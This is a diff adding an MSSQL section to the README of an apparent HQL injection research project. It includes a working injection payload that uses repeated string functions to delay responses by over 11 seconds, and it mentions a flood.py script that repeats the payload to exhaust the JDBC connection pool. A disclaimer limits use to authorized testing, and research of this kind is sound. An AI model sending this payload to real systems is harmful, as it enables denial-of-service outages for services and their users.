pdstat/hqli/README.md

 ![](./images/oracle-ssrf.png)

+## MSSQL

+### Availability

+In the context of this injection for MSSQL we can't use the `WAITFOR DELAY` command directly as it results in a syntax error.

+However we can use expensive string based operations to cause a delay in the response, which could be used for a denial of service attack.
+For example, to cause a delay, you can use the following payload:

+`0' or function('DATALENGTH', function('REPLICATE', function('CONCAT', function('NEWID'), function('REPLICATE','A',4000), function('REPLICATE','B',4000), function('REPLICATE','C',4000), function('REPLICATE','D',4000)), 50000))>0 or '1'='2`

+This takes +11 seconds for a single response to return.
+The flood.py script can be used to continuously send this payload to the server, which will flood the JDBC connection pool and cause a denial of service.

 ---
 **Disclaimer:** This project is for educational and testing purposes only.
 Do not use on systems without proper authorization.